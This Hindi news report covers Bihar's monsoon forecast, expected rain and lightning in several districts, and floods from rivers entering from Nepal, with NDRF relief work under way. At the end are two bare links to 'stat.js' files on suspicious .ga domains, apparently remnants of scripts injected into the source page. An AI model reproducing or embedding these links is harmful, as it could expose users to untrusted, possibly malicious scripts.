पटना मौसम विज्ञान केंद्र के विज्ञानी संजय कुमार के अनुसार मौसम तेजी से बदल रहा है। वर्तमान में मानसून की ट्रफ लाइन झारखंड, पश्चिमी बंगाल, त्रिपुरा से गुजर रही है। इस कारण बारिश में कमी आई है, लेकिन रविवार से बदलाव के संकेत मिलने की उम्मीद है। रविवार से मानसून की ट्रफ लाइन उत्तर की ओर बढ़ सकती है। इससे बिहार में बारिश के आसार बन सकते हैं।
रविवार को राज्य के आकाश में बादल छाए रहेंगे। कुछ इलाकों में हल्की बारिश हो सकती है। व’ज्रपात की भी आशंका है। मौसम विभाग के अनुसार बेगूसराय, जहानाबाद, अरवल, भोजपुर व बक्सर आदि कई जिलों में बारिश और व’ज्रपात हो सकता है। कहीं-कहीं तेज बारिश भी हो सकती है।
जहां तक बाढ़ की बात है, कई इलाकों में ख’तरा मंडरा रहा है। कुछ नदियां उफान पर हैं। नेपाल से बिहार आने वाली नदियां उफान पर हैं। गंडक, कोसी, बागमती, लखनदेई, बूढ़ी गंडक जैसी नदियां सब कुछ अपने आगोश में चपेट लेने को उतारू हैं। नदियों के तेज बहाव से सड़कों का संपर्क टूट गया है। हालांकि ऐसा नहीं है कि यह खतरा अचानक से आया है बल्कि पहले से ही इसकी अंदेशा जताई जा रही थी। सड़क जलमग्न हो चुके हैं और हजारों लोगों को विस्थापित होना पड़ रहा है। एनडीआरएफ की टीम राहत और बचाव कार्य में जुटी हुई है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms